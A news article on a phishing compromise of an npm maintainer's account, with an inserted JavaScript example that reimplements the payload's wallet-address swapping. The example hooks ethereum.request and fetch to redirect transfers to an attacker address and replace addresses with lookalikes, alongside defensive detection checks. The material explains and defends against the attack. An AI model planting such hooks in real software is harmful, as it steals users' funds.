Massive npm Attack Targets Ethereum and Solana Wallets, But Only a Few Cents Taken

A significant phishing attack compromised a major Node.js developer, resulting in malicious code embedded in popular packages but only minimal financial gain for the attacker.

Key Points:

  • A phishing email compromised a prominent Node.js developer, injecting harmful code into widely used packages.
  • Despite the attack's scope, the attacker netted only a few cents, while security teams are left with the cost of auditing and updating affected systems.
  • The injected code hooked wallet and network functions in the browser to redirect Ethereum transfers and corrupt Solana recipients, with negligible financial impact.

A phishing email on Monday compromised the npm account of one of Node.js's most prolific maintainers, allowing malicious code to be inserted into packages downloaded billions of times weekly, in what researchers consider one of the most significant software supply-chain attacks in recent memory.

While the attack’s reach was vast, a report from the Security Alliance released on Tuesday indicates that the attacker escaped with only a few cents. However, the burden of updating backend systems to mitigate future risks now falls to security teams.

The compromised maintainer, known as 'qix' and known for libraries such as chalk and debug-js, was contacted last week by an email sent from support@npmjs[.]help, a domain that previously pointed to a Russian server and that led to a counterfeit two-factor authentication page hosted on BunnyCDN.

The credential stealer captured the username, password, and 2FA code and transmitted them to a remote server. With full control of the account, the attacker republished all of 'qix's packages with a crypto-sabotage payload embedded.

Node Package Manager (npm) functions as an app store for developers, letting them pull in ready-made code packages rather than writing everything from scratch. A maintainer is responsible for creating and updating such packages, and any project that installs one automatically receives whatever the maintainer's account publishes.

Attack Methodology

The malicious code was simple. It checked whether window.ethereum was available and then hooked the provider's transaction-related calls. Calls to approve, permit, transfer, or transferFrom were silently redirected to a specific wallet: 0xFc4a4858bafef54D1b1d7697bfb5c52F4c166976. Any Ethereum transaction with a non-zero value and empty calldata (a plain ETH transfer) was redirected as well. On Solana, the malware overwrote transfer recipients with an invalid address beginning "1911…", so those transfers could not succeed at all.

Network requests were intercepted as well. By hooking fetch and XMLHttpRequest, the malware scanned JSON responses for strings that looked like wallet addresses and replaced each with one of about 280 hardcoded attacker-controlled addresses chosen to look similar to the original, so a user copying an address from a page would copy the attacker's.
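The two interception layers just described, as an added example that is not the incident's payload and not any wallet's or project's code: a Node-only model of the provider hook and of the fetch/XHR response rewriting, followed by the checks a dapp or wallet can run against them. ATTACKER, INTENDED and LOOKALIKES are constructed placeholders rather than addresses from the incident, choosing the lookalike by Levenshtein distance is an assumption about how "deceptively similar" was achieved, and the sandbox models fetch as a synchronous call returning body text so everything can be exercised without a network.

```javascript
"use strict";

// Added example (not the incident's payload, not any wallet's code). The
// sandbox object stands in for `window`; addresses below are constructed
// placeholders; nearest-by-edit-distance lookalike choice is an assumption.
const EVM_ADDR = /0x[0-9a-fA-F]{40}/g;
const EMPTY_CALLDATA = new Set([undefined, null, "", "0x"]);

const ATTACKER = "0xDEAD" + "0".repeat(32) + "BEEF";
const INTENDED = "0x1234567890aBcDeF1234567890aBcDeF12345678";
// Stand-in for the ~280 hardcoded attacker addresses the payload carried.
const LOOKALIKES = [
  "0xAAAA" + "0".repeat(35) + "1",
  "0xAAAA" + "0".repeat(35) + "2",
  "0x1234567890aBcDeF1234567890aBcDeF12345679", // one character off INTENDED
];

// Single-row Levenshtein edit distance.
function levenshtein(a, b) {
  const row = Array.from({ length: b.length + 1 }, (_, j) => j);
  for (let i = 1; i <= a.length; i++) {
    let diag = row[0];
    row[0] = i;
    for (let j = 1; j <= b.length; j++) {
      const above = row[j];
      row[j] = Math.min(above + 1, row[j - 1] + 1, diag + (a[i - 1] === b[j - 1] ? 0 : 1));
      diag = above;
    }
  }
  return row[b.length];
}

function closestLookalike(addr, pool = LOOKALIKES) {
  let best = pool[0], bestDistance = Infinity;
  for (const candidate of pool) {
    const d = levenshtein(addr.toLowerCase(), candidate.toLowerCase());
    if (d < bestDistance) { bestDistance = d; best = candidate; }
  }
  return best;
}

// Layer 1, provider hook: a plain ETH transfer (non-zero value, empty
// calldata) gets its recipient swapped. Contract calls pass through here;
// the real payload handled approve/permit/transfer/transferFrom separately.
function rewriteValueTransfer(tx, attacker) {
  const value = tx.value == null ? 0n : BigInt(tx.value);
  return value > 0n && EMPTY_CALLDATA.has(tx.data) ? { ...tx, to: attacker } : tx;
}

// Layer 2, network hook: every address-looking string in a response body is
// replaced by the nearest entry of the lookalike pool.
function swapAddresses(body, pool = LOOKALIKES) {
  return body.replace(EVM_ADDR, (m) => closestLookalike(m, pool));
}

// Patch the sandbox's globals the way a payload does at load time.
function installHooks(sandbox, attacker, pool = LOOKALIKES) {
  const originalRequest = sandbox.ethereum.request.bind(sandbox.ethereum);
  sandbox.ethereum.request = (args) => {
    if (args.method !== "eth_sendTransaction") return originalRequest(args);
    const [tx, ...rest] = args.params;
    return originalRequest({ ...args, params: [rewriteValueTransfer(tx, attacker), ...rest] });
  };
  const originalFetch = sandbox.fetch;
  sandbox.fetch = (url, init) => swapAddresses(originalFetch(url, init), pool);
}

// Check 1: are the hot globals still native? In a browser, fetch, XHR and the
// injected provider's request report "[native code]"; a JS wrapper does not.
// A payload that also patches Function.prototype.toString defeats this, so
// treat it as one signal. (Node's own fetch is JS, so tests use a builtin.)
function nonNativeGlobals(obj, names) {
  return names.filter((name) => {
    const fn = obj[name];
    return typeof fn !== "function" || !/\[native code\]/.test(Function.prototype.toString.call(fn));
  });
}

// Check 2: does what left the provider match the recipient the user confirmed?
// (A hardware wallet's on-device display is the strongest form of this check.)
function recipientTampered(expectedTo, sentTx) {
  return sentTx.to.toLowerCase() !== expectedTo.toLowerCase();
}

// Check 3: does a fetched body still carry an address known out of band?
function bodyMentions(body, addr) {
  return (body.match(EVM_ADDR) || []).some((m) => m.toLowerCase() === addr.toLowerCase());
}

// Constructed sandbox: a stub provider recording what it sends and a stub
// fetch returning an invoice body with the intended payout address.
function demo() {
  const sent = [];
  const sandbox = {
    ethereum: { request: (args) => { sent.push(args.params[0]); return "0xstubhash"; } },
    fetch: () => JSON.stringify({ payTo: INTENDED }),
  };
  installHooks(sandbox, ATTACKER);
  sandbox.ethereum.request({ method: "eth_sendTransaction", params: [{ to: INTENDED, value: "0x1", data: "0x" }] });
  const body = sandbox.fetch("https://example.invalid/invoice");
  return {
    sentTo: sent[0].to,
    tampered: recipientTampered(INTENDED, sent[0]),
    payTo: JSON.parse(body).payTo,
    intendedSurvived: bodyMentions(body, INTENDED),
  };
}

if (typeof require !== "undefined" && require.main === module) console.log(demo());
```

Running it shows both layers doing what the article describes: the plain transfer leaves the provider addressed to ATTACKER even though the dapp asked for INTENDED, and the invoice body comes back carrying the lookalike that differs from INTENDED by one character. The native-code check is cheap but defeatable, which is why the recipient comparison, ideally against a hardware wallet's screen, is the check that actually protects funds.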

Consequences of the Attack

Despite the widespread distribution, the outcomes were minimal.

On-chain analysis indicates the attacker received roughly five cents in ether and about $20 in an obscure memecoin, which had a trading volume of less than $600, as detailed in the Security Alliance report.

The widely used MetaMask browser wallet clarified on X that it was not affected by the npm supply-chain attack, because it pins dependency versions, applies manual and automated review to updates, and rolls them out in stages. It also uses LavaMoat to contain malicious code injected through dependencies and Blockaid to flag attacker-controlled wallet addresses quickly.

Separately, Charles Guillemet, CTO of Ledger, warned that malicious scripts had been injected into packages with over a billion downloads and were specifically engineered to silently swap wallet addresses during transactions.

This incident follows a warning last week from ReversingLabs about npm packages that used Ethereum smart contracts to hide their command-and-control endpoints, disguising C2 traffic as routine blockchain requests.
